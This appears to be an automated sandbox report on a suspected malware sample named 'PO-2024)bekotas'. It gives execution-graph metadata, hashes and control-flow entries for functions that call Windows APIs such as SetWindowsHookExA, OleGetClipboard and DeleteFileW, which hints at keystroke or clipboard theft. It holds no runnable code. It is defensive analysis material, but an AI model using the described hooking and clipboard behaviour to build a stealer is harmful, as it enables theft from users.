                                        • Snapshot File: hcaresult_0_2_50f0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 4']q$4']q$4']q$4']q$4']q$4']q
                                        • API String ID: 0-471056614
                                        • Opcode ID: 7466f20c1cc5bfed56ea0d083ea036ef65ac280250c3eb5d05773d0367b78fa1
                                        • Instruction ID: c1f6d0b5e6789c1cec212a13477b12bebb3bfa029347ca69b0122829ccff8608
                                        • Opcode Fuzzy Hash: 7466f20c1cc5bfed56ea0d083ea036ef65ac280250c3eb5d05773d0367b78fa1
                                        • Instruction Fuzzy Hash: 12412230E412068FCB0CEF64EC5155E7BB6FF44304BC1496AD4459B2A5EF34AD26DB91

                                        Execution Graph

                                        Execution Coverage:11.1%
                                        Dynamic/Decrypted Code Coverage:92.1%
                                        Signature Coverage:0%
                                        Total number of Nodes:178
                                        Total number of Limit Nodes:17
                                        execution_graph 26404 50e78eb 26405 50e78f0 GetModuleHandleW 26404->26405 26407 50e7965 26405->26407 26408 50efe28 26410 50efe6c SetWindowsHookExA 26408->26410 26411 50efeb2 26410->26411 26412 fe7258 26413 fe729e DeleteFileW 26412->26413 26415 fe72d7 26413->26415 26423 fe0848 26425 fe084e 26423->26425 26424 fe091b 26425->26424 26427 fe1380 26425->26427 26429 fe1396 26427->26429 26428 fe1490 26428->26425 26429->26428 26432 50e58f8 26429->26432 26438 50e58e3 26429->26438 26433 50e58f9 26432->26433 26437 50e59bb 26433->26437 26444 50e07b4 26433->26444 26435 50e5981 26449 50e07d4 26435->26449 26437->26429 26439 50e58ec 26438->26439 26440 50e07b4 2 API calls 26439->26440 26443 50e59bb 26439->26443 26441 50e5981 26440->26441 26442 50e07d4 KiUserCallbackDispatcher 26441->26442 26442->26443 26443->26429 26445 50e07bf 26444->26445 26453 50e6ea9 26445->26453 26464 50e6eb8 26445->26464 26446 50e5f62 26446->26435 26450 50e07df 26449->26450 26452 50ed8b3 26450->26452 26510 50ec304 26450->26510 26452->26437 26454 50e6eb0 26453->26454 26475 50e5e0c 26454->26475 26457 50e6f66 26460 50e6f92 26457->26460 26485 50e5e1c 26457->26485 26462 50e5e0c GetModuleHandleW 26462->26457 26465 50e6ee3 26464->26465 26466 50e5e0c GetModuleHandleW 26465->26466 26467 50e6f4a 26466->26467 26473 50e5e0c GetModuleHandleW 26467->26473 26474 50e7391 GetModuleHandleW 26467->26474 26468 50e6f66 26469 50e5e1c GetModuleHandleW 26468->26469 26471 50e6f92 26468->26471 26470 50e6fd6 26469->26470 26470->26471 26472 50e894d CreateWindowExW 26470->26472 26472->26471 26473->26468 26474->26468 26476 50e5e17 26475->26476 26477 50e6f4a 26476->26477 26494 50e769e 26476->26494 26502 50e760f 26476->26502 26477->26462 26480 50e7391 26477->26480 26481 50e739c 26480->26481 26482 50e73ab 26481->26482 26483 50e769e GetModuleHandleW 26481->26483 26484 50e760f GetModuleHandleW 26481->26484 26482->26457 26483->26482 26484->26482 26486 50e78f0 GetModuleHandleW 26485->26486 26488 50e6fd6 26486->26488 26488->26460 26489 50e894d 26488->26489 26490 50e8985 CreateWindowExW 26489->26490 26491 50e8951 26489->26491 26493 50e8abc 26490->26493 26491->26460 26493->26493 26495 50e76ee 26494->26495 26496 50e5e1c GetModuleHandleW 26495->26496 26497 50e773a 26496->26497 26498 50e5e1c GetModuleHandleW 26497->26498 26501 50e77b4 26497->26501 26499 50e7788 26498->26499 26500 50e5e1c GetModuleHandleW 26499->26500 26499->26501 26500->26501 26501->26477 26503 50e761a 26502->26503 26504 50e5e1c GetModuleHandleW 26503->26504 26505 50e773a 26504->26505 26506 50e5e1c GetModuleHandleW 26505->26506 26509 50e77b4 26505->26509 26507 50e7788 26506->26507 26508 50e5e1c GetModuleHandleW 26507->26508 26507->26509 26508->26509 26509->26477 26511 50ed8c8 KiUserCallbackDispatcher 26510->26511 26513 50ed936 26511->26513 26513->26450 26514 50ec6f8 DuplicateHandle 26515 50ec78e 26514->26515 26516 e4d01c 26517 e4d034 26516->26517 26519 e4d08e 26517->26519 26523 50e6c4c 26517->26523 26531 50e8b50 26517->26531 26535 50e8b43 26517->26535 26539 50ed2d3 26517->26539 26525 50e6c57 26523->26525 26524 50ed361 26559 50ec2ac 26524->26559 26525->26524 26527 50ed351 26525->26527 26547 50ed478 26527->26547 26553 50ed488 26527->26553 26528 50ed35f 26528->26528 26532 50e8b51 26531->26532 26533 50e6c4c 2 API calls 26532->26533 26534 50e8b97 26533->26534 26534->26519 26536 50e8b4c 26535->26536 26537 50e6c4c 2 API calls 26536->26537 26538 50e8b97 26537->26538 26538->26519 26540 50ed2da 26539->26540 26541 50ed361 26540->26541 26542 50ed351 26540->26542 26543 50ec2ac 2 API calls 26541->26543 26545 50ed478 2 API calls 26542->26545 26546 50ed488 2 API calls 26542->26546 26544 50ed35f 26543->26544 26545->26544 26546->26544 26549 50ed47c 26547->26549 26548 50ec2ac 2 API calls 26548->26549 26549->26548 26550 50ed56e 26549->26550 26566 50ed968 26549->26566 26571 50ed958 26549->26571 26550->26528 26555 50ed496 26553->26555 26554 50ec2ac 2 API calls 26554->26555 26555->26554 26556 50ed56e 26555->26556 26557 50ed958 OleGetClipboard 26555->26557 26558 50ed968 OleGetClipboard 26555->26558 26556->26528 26557->26555 26558->26555 26560 50ec2b7 26559->26560 26561 50ed5ca 26560->26561 26562 50ed674 26560->26562 26564 50ed622 CallWindowProcW 26561->26564 26565 50ed5d1 26561->26565 26563 50e6c4c OleGetClipboard 26562->26563 26563->26565 26564->26565 26565->26528 26567 50ed969 26566->26567 26568 50eda20 26567->26568 26576 50ededf 26567->26576 26582 50edf20 26567->26582 26568->26549 26572 50ed95c 26571->26572 26573 50eda20 26572->26573 26574 50ededf OleGetClipboard 26572->26574 26575 50edf20 OleGetClipboard 26572->26575 26573->26549 26574->26572 26575->26572 26577 50edef5 26576->26577 26578 50edf3c 26577->26578 26588 50edf58 26577->26588 26599 50edf68 26577->26599 26578->26567 26579 50edf51 26579->26567 26584 50edf28 26582->26584 26583 50edf3c 26583->26567 26584->26583 26586 50edf58 OleGetClipboard 26584->26586 26587 50edf68 OleGetClipboard 26584->26587 26585 50edf51 26585->26567 26586->26585 26587->26585 26589 50edf64 26588->26589 26590 50edf95 26589->26590 26592 50edfd9 26589->26592 26595 50edf58 OleGetClipboard 26590->26595 26596 50edf68 OleGetClipboard 26590->26596 26591 50edf9b 26591->26579 26594 50ee059 26592->26594 26610 50ee220 26592->26610 26614 50ee230 26592->26614 26593 50ee077 26593->26579 26594->26579 26595->26591 26596->26591 26600 50edf69 26599->26600 26601 50edf95 26600->26601 26603 50edfd9 26600->26603 26606 50edf58 OleGetClipboard 26601->26606 26607 50edf68 OleGetClipboard 26601->26607 26602 50edf9b 26602->26579 26605 50ee059 26603->26605 26608 50ee220 OleGetClipboard 26603->26608 26609 50ee230 OleGetClipboard 26603->26609 26604 50ee077 26604->26579 26605->26579 26606->26602 26607->26602 26608->26604 26609->26604 26612 50ee230 26610->26612 26613 50ee26b 26612->26613 26618 50edcc8 26612->26618 26613->26593 26616 50ee245 26614->26616 26615 50edcc8 OleGetClipboard 26615->26616 26616->26615 26617 50ee26b 26616->26617 26617->26593 26619 50ee2d8 OleGetClipboard 26618->26619 26621 50ee372 26619->26621 26416 50ee140 26417 50ee14b 26416->26417 26418 50ee15b 26417->26418 26420 50edbb0 26417->26420 26421 50ee190 OleInitialize 26420->26421 26422 50ee1f4 26421->26422 26422->26418

                                        Executed Functions

                                        Function 050E894D Relevance: 1.6, APIs: 1, Instructions: 139COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1468 50e894d-50e894f 1469 50e8985-50e89fe 1468->1469 1470 50e8951-50e8978 call 50e6c24 1468->1470 1472 50e8a09-50e8a10 1469->1472 1473 50e8a00-50e8a06 1469->1473 1474 50e897d-50e897e 1470->1474 1475 50e8a1b-50e8aba CreateWindowExW 1472->1475 1476 50e8a12-50e8a18 1472->1476 1473->1472 1478 50e8abc-50e8ac2 1475->1478 1479 50e8ac3-50e8afb 1475->1479 1476->1475 1478->1479 1483 50e8afd-50e8b00 1479->1483 1484 50e8b08 1479->1484 1483->1484 1485 50e8b09 1484->1485 1485->1485
                                        APIs
                                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 050E8AAA
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4461361402.00000000050E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_50e0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID: CreateWindow
                                        • String ID:
                                        • API String ID: 716092398-0
                                        • Opcode ID: dfa3ee0de8d812a838f0f28e24f53e4f4b1d975fec152c4837d95f7b0af52f20
                                        • Instruction ID: 2df6f278fccba96066619b88f54f13f1cfbbc9fd78af685e3aaab8e1cb2979ca
                                        • Opcode Fuzzy Hash: dfa3ee0de8d812a838f0f28e24f53e4f4b1d975fec152c4837d95f7b0af52f20
                                        • Instruction Fuzzy Hash: CC51E0B1C00249EFDF15CF99D884ADEBFB1BF49300F28816AE818AB220D7759955CF50
                                        Function 050E8998 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1486 50e8998-50e89fe 1487 50e8a09-50e8a10 1486->1487 1488 50e8a00-50e8a06 1486->1488 1489 50e8a1b-50e8a53 1487->1489 1490 50e8a12-50e8a18 1487->1490 1488->1487 1491 50e8a5b-50e8aba CreateWindowExW 1489->1491 1490->1489 1492 50e8abc-50e8ac2 1491->1492 1493 50e8ac3-50e8afb 1491->1493 1492->1493 1497 50e8afd-50e8b00 1493->1497 1498 50e8b08 1493->1498 1497->1498 1499 50e8b09 1498->1499 1499->1499
                                        APIs
                                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 050E8AAA
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4461361402.00000000050E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_50e0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID: CreateWindow
                                        • String ID:
                                        • API String ID: 716092398-0
                                        • Opcode ID: 9ffa99ecea9db10682d7210bbcf26dfc430532adcad152f8980867ba96457602
                                        • Instruction ID: 96218e87703fc3142036d0fa07184a98e0b181dd8397771ce59cf8c260f87616
                                        • Opcode Fuzzy Hash: 9ffa99ecea9db10682d7210bbcf26dfc430532adcad152f8980867ba96457602
                                        • Instruction Fuzzy Hash: 4F4190B1D00349DFDB14CF9AD884ADEBBB5BF48310F24812AE419AB250D775A985CF90
                                        Function 050EC2AC Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1500 50ec2ac-50ed5c4 1504 50ed5ca-50ed5cf 1500->1504 1505 50ed674-50ed694 call 50e6c4c 1500->1505 1507 50ed622-50ed65a CallWindowProcW 1504->1507 1508 50ed5d1-50ed608 1504->1508 1513 50ed697-50ed6a4 1505->1513 1509 50ed65c-50ed662 1507->1509 1510 50ed663-50ed672 1507->1510 1514 50ed60a-50ed610 1508->1514 1515 50ed611-50ed620 1508->1515 1509->1510 1510->1513 1514->1515 1515->1513
                                        APIs
                                        • CallWindowProcW.USER32(?,?,?,?,?), ref: 050ED649
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4461361402.00000000050E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_50e0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID: CallProcWindow
                                        • String ID:
                                        • API String ID: 2714655100-0
                                        • Opcode ID: 610ca886781fb5480554a01848f6f71dc6df3f993a330de36ed3ba3a6262e0c9
                                        • Instruction ID: 1c082015c13418f8c09c9883094efb1be035bbc50b9cdc3d70584ff5f1f05072
                                        • Opcode Fuzzy Hash: 610ca886781fb5480554a01848f6f71dc6df3f993a330de36ed3ba3a6262e0c9
                                        • Instruction Fuzzy Hash: C74115B5A003498FCB14CF99D488AAEBBF5FF89314F248459D519AB321D375A841CFA0
                                        Function 050EE2CC Relevance: 1.6, APIs: 1, Instructions: 78comclipboardCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1518 50ee2cc-50ee2ce 1519 50ee2d5-50ee328 1518->1519 1520 50ee2d0-50ee2d3 1518->1520 1522 50ee332-50ee370 OleGetClipboard 1519->1522 1520->1519 1523 50ee379-50ee3c7 1522->1523 1524 50ee372-50ee378 1522->1524 1529 50ee3c9-50ee3cd 1523->1529 1530 50ee3d7 1523->1530 1524->1523 1529->1530 1531 50ee3cf 1529->1531 1532 50ee3d8 1530->1532 1531->1530 1532->1532
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4461361402.00000000050E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_50e0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID: Clipboard
                                        • String ID:
                                        • API String ID: 220874293-0
                                        • Opcode ID: 523266ad779997d68ba818f96daf7ff16233a4f67e95ef1c5843575cf96cdd22
                                        • Instruction ID: 6ece7fdca19a0498d621d4f2243ecaf3c07474d03683ee6a6e1030e142e32c21
                                        • Opcode Fuzzy Hash: 523266ad779997d68ba818f96daf7ff16233a4f67e95ef1c5843575cf96cdd22
                                        • Instruction Fuzzy Hash: E53104B090124CDFDB24CFA9D988BCEBBF5BF48314F248029E504AB290D7B46945CF65
                                        Function 050EDCC8 Relevance: 1.6, APIs: 1, Instructions: 74comclipboardCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1533 50edcc8-50ee370 OleGetClipboard 1536 50ee379-50ee3c7 1533->1536 1537 50ee372-50ee378 1533->1537 1542 50ee3c9-50ee3cd 1536->1542 1543 50ee3d7 1536->1543 1537->1536 1542->1543 1544 50ee3cf 1542->1544 1545 50ee3d8 1543->1545 1544->1543 1545->1545
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4461361402.00000000050E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_50e0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID: Clipboard
                                        • String ID:
                                        • API String ID: 220874293-0
                                        • Opcode ID: b22867ad9f610cd0d9c210be4a56840ec8e668240ff3c0d52852713280994f00
                                        • Instruction ID: dec340843452580ff020b304f5ba77dd6bd4c82bcf378cee678ad4f317ccc3b9
                                        • Opcode Fuzzy Hash: b22867ad9f610cd0d9c210be4a56840ec8e668240ff3c0d52852713280994f00
                                        • Instruction Fuzzy Hash: EE3103B090124CDFDB24CFA9D988B9EBBF5BF48304F208069E504AB390D7B45945CFA5
                                        Function 050EC6F0 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1546 50ec6f0-50ec6f7 1547 50ec6f8-50ec78c DuplicateHandle 1546->1547 1548 50ec78e-50ec794 1547->1548 1549 50ec795-50ec7b2 1547->1549 1548->1549
                                        APIs
                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 050EC77F
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4461361402.00000000050E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_50e0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID: DuplicateHandle
                                        • String ID:
                                        • API String ID: 3793708945-0
                                        • Opcode ID: b7fb26b56142799d5e091a35df6019f23ecd1aef7127b9fe4d6b609138e082b0
                                        • Instruction ID: 39cc0e89a7ade89ad7ea824f11d5ad7ecb2fdeedfac11f29b531eef91547cb25
                                        • Opcode Fuzzy Hash: b7fb26b56142799d5e091a35df6019f23ecd1aef7127b9fe4d6b609138e082b0
                                        • Instruction Fuzzy Hash: E321E6B5900258DFDB10CFAAD584AEEBFF8FB48310F14801AE958A7350D379A940DFA1
                                        Function 050EC6F8 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1552 50ec6f8-50ec78c DuplicateHandle 1553 50ec78e-50ec794 1552->1553 1554 50ec795-50ec7b2 1552->1554 1553->1554
                                        APIs
                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 050EC77F
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4461361402.00000000050E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_50e0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID: DuplicateHandle
                                        • String ID:
                                        • API String ID: 3793708945-0
                                        • Opcode ID: 27f86ae40b30811cc261858827749888cd548375b45359ad20958421325ad0b8
                                        • Instruction ID: 34a0eead6f1f20431ab75bae6d06edcd053b6c8553a2743ebf55cb0571c1db30
                                        • Opcode Fuzzy Hash: 27f86ae40b30811cc261858827749888cd548375b45359ad20958421325ad0b8
                                        • Instruction Fuzzy Hash: 9A21E4B59002489FDB10CFAAD584ADEBBF8FB48310F14801AE958A3310D379A940CFA0
                                        Function 00FE7251 Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1557 fe7251-fe72a2 1560 fe72aa-fe72d5 DeleteFileW 1557->1560 1561 fe72a4-fe72a7 1557->1561 1562 fe72de-fe7306 1560->1562 1563 fe72d7-fe72dd 1560->1563 1561->1560 1563->1562
                                        APIs
                                        • DeleteFileW.KERNELBASE(00000000), ref: 00FE72C8
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4456177209.0000000000FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_fe0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID: DeleteFile
                                        • String ID:
                                        • API String ID: 4033686569-0
                                        • Opcode ID: 837b8e5260342cc46e71002020c700727ac04986b253165789be394a05ee6d30
                                        • Instruction ID: 552add14e46b7435d213069dacdcea461fbe07274be66b6101d1186d895e1b2c
                                        • Opcode Fuzzy Hash: 837b8e5260342cc46e71002020c700727ac04986b253165789be394a05ee6d30
                                        • Instruction Fuzzy Hash: 6D2147B1C0465A9FCB10DF9AC444AEEFBF4EF48320F14816AD918A7240D738A945CFA1
                                        Function 050EFE23 Relevance: 1.6, APIs: 1, Instructions: 58COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1566 50efe23-50efe72 1569 50efe7e-50efeb0 SetWindowsHookExA 1566->1569 1570 50efe74-50efe7c 1566->1570 1571 50efeb9-50efed9 1569->1571 1572 50efeb2-50efeb8 1569->1572 1570->1569 1572->1571
                                        APIs
                                        • SetWindowsHookExA.USER32(?,00000000,?,?), ref: 050EFEA3
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4461361402.00000000050E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_50e0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID: HookWindows
                                        • String ID:
                                        • API String ID: 2559412058-0
                                        • Opcode ID: 9245fcbaa74542e5cbc0d7bee19c676e633f127a10e3ab0fcc5c215547aab5d9
                                        • Instruction ID: cb88ab95e610e95f88cc5074d1852e44d8d8f52f393a43e932a90fd58fd4f385
                                        • Opcode Fuzzy Hash: 9245fcbaa74542e5cbc0d7bee19c676e633f127a10e3ab0fcc5c215547aab5d9
                                        • Instruction Fuzzy Hash: 8E2113B59042099FCB14DF9AD844BEEFBF5FB88310F20842AE419A7250C774A941CFA1
                                        Function 050EFE28 Relevance: 1.6, APIs: 1, Instructions: 57COMMON
                                        Download Yara Rule
                                        APIs
                                        • SetWindowsHookExA.USER32(?,00000000,?,?), ref: 050EFEA3
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4461361402.00000000050E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_50e0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID: HookWindows
                                        • String ID:
                                        • API String ID: 2559412058-0
                                        • Opcode ID: 4273e7a6bcf56de94622fa46b6a834c5adb8f14b8d0c4ce3deeddd1b08d4fd71
                                        • Instruction ID: 62b1d085520b26e104093ebee86de62fdb9612971cb3fd42753bf77c8c2ac671
                                        • Opcode Fuzzy Hash: 4273e7a6bcf56de94622fa46b6a834c5adb8f14b8d0c4ce3deeddd1b08d4fd71
                                        • Instruction Fuzzy Hash: 1521E3B59042099FDB14DF9AD844BEEFBF5FB88310F20842AE459A7250C774A945CFA1
                                        Function 00FE7258 Relevance: 1.6, APIs: 1, Instructions: 56fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • DeleteFileW.KERNELBASE(00000000), ref: 00FE72C8
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4456177209.0000000000FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_fe0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID: DeleteFile
                                        • String ID:
                                        • API String ID: 4033686569-0
                                        • Opcode ID: 58d1c5fab2aab5eb04c976aae911cc6c9b2d2c72be3626f8555b1f8dc920986d
                                        • Instruction ID: 19fa9fb409b8d00a59d6a72cd6e1658331902ff53106350832b81dd93696a6bf
                                        • Opcode Fuzzy Hash: 58d1c5fab2aab5eb04c976aae911cc6c9b2d2c72be3626f8555b1f8dc920986d
                                        • Instruction Fuzzy Hash: C31130B1C0465A9BCB10DF9AC544AAEFBB4EF48320F10812AE918A7240D738A940CFA1
                                        Function 050E5E1C Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 050E7956
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4461361402.00000000050E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_50e0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID: HandleModule
                                        • String ID:
                                        • API String ID: 4139908857-0
                                        • Opcode ID: 077653881e53f4288e38976165c30871c027c697630fd5591ffc9d2f180d0807
                                        • Instruction ID: 2767aefa6c6d8602fda78629fc10b5ad95530b7774637b21dc0099c337cec4d8
                                        • Opcode Fuzzy Hash: 077653881e53f4288e38976165c30871c027c697630fd5591ffc9d2f180d0807
                                        • Instruction Fuzzy Hash: F811FDB58046898FCB10DF9AE444A9EFBF4EF89210F20842AD869B7210D379A545CFA1
                                        Function 050E78EB Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 050E7956
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4461361402.00000000050E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_50e0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID: HandleModule
                                        • String ID:
                                        • API String ID: 4139908857-0
                                        • Opcode ID: a7899586ea6e0517635ab8cbefab7ca644595f4dcd14cbb899ded785ee053fc0
                                        • Instruction ID: db1a047ac8619281dee90cfcea9d618a1e635a0f0166ed0344e7c49da2c6f0aa
                                        • Opcode Fuzzy Hash: a7899586ea6e0517635ab8cbefab7ca644595f4dcd14cbb899ded785ee053fc0
                                        • Instruction Fuzzy Hash: 07110FB6C002498FCB10DF9AD844A9EFBF4EF89210F20841AD469B7310C379A545CFA1
                                        Function 050EE189 Relevance: 1.5, APIs: 1, Instructions: 47comCOMMON
                                        Download Yara Rule
                                        APIs
                                        • OleInitialize.OLE32(00000000), ref: 050EE1E5
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4461361402.00000000050E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_50e0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID: Initialize
                                        • String ID:
                                        • API String ID: 2538663250-0
                                        • Opcode ID: ab25e82fa25be3f600da94766d2a900467c4878915039d6391440d34f0331447
                                        • Instruction ID: b67365c903dc25bd542cef0408e069d6ebddf70527fdd7ba82d52fd64ab48585
                                        • Opcode Fuzzy Hash: ab25e82fa25be3f600da94766d2a900467c4878915039d6391440d34f0331447
                                        • Instruction Fuzzy Hash: EF1136B58043498FCB10DFAAD444BDEFFF8AB48310F248459E559A7610D378A584CFA1
                                        Function 050EC304 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                        Download Yara Rule
                                        APIs
                                        • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,050ED89D), ref: 050ED927
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4461361402.00000000050E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_50e0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID: CallbackDispatcherUser
                                        • String ID:
                                        • API String ID: 2492992576-0
                                        • Opcode ID: 1a2285a7a5b28268614812affb944a521a26c2825b672b901dabc508b1c1ad9e
                                        • Instruction ID: a07c5b18bd6293dcd24afdeab0cbf5d24893d44615a4384ddf5846d3eb6c573a
                                        • Opcode Fuzzy Hash: 1a2285a7a5b28268614812affb944a521a26c2825b672b901dabc508b1c1ad9e
                                        • Instruction Fuzzy Hash: 3E1115B5804648DFCB10DF9AE944BDEFBF4FB49310F20845AD519A7250C378A944CFA5
                                        Function 050ED8C0 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                        Download Yara Rule
                                        APIs
                                        • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,050ED89D), ref: 050ED927
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4461361402.00000000050E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_50e0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID: CallbackDispatcherUser
                                        • String ID:
                                        • API String ID: 2492992576-0
                                        • Opcode ID: 92510eb8e4e957c13398a4a181a6ed1a2cbfe8983fe8031e382081192dc96c34
                                        • Instruction ID: f7ff87cff1d4f2d360b415745e305e3fbee8c45ba769a768a8a98e8ced73f4c6
                                        • Opcode Fuzzy Hash: 92510eb8e4e957c13398a4a181a6ed1a2cbfe8983fe8031e382081192dc96c34
                                        • Instruction Fuzzy Hash: 161133B58042489FCB10DFAAD884BDEFFF8EF48310F20841AD559A3210C378A540CFA1
                                        Function 050EDBAD Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON
                                        Download Yara Rule
                                        APIs
                                        • OleInitialize.OLE32(00000000), ref: 050EE1E5
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4461361402.00000000050E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_50e0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID: Initialize
                                        • String ID:
                                        • API String ID: 2538663250-0
                                        • Opcode ID: 8c2ab771b86d0b3db9b3123d7a5dd02e9c60e32028c0b81d347b8b05774d30d0
                                        • Instruction ID: 082232a665568adee4e05cf2c093a83b76a2fd024c3e8994f05133ffc6147795
                                        • Opcode Fuzzy Hash: 8c2ab771b86d0b3db9b3123d7a5dd02e9c60e32028c0b81d347b8b05774d30d0
                                        • Instruction Fuzzy Hash: C71145B59043488FCB10DF9AD844BDEBBF8EB48310F248459E559A7310C339A584CFA5
                                        Function 050EDBB0 Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON
                                        Download Yara Rule
                                        APIs
                                        • OleInitialize.OLE32(00000000), ref: 050EE1E5
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4461361402.00000000050E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_50e0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID: Initialize
                                        • String ID:
                                        • API String ID: 2538663250-0
                                        • Opcode ID: 6d86ec4bad0151a0a4077924d0f7d5c6c12493a218a9ab486df23a68eeced445
                                        • Instruction ID: d92e4a7516280a93a84f5b43c429387fd9be773013f759d40543ec5fff87d33f
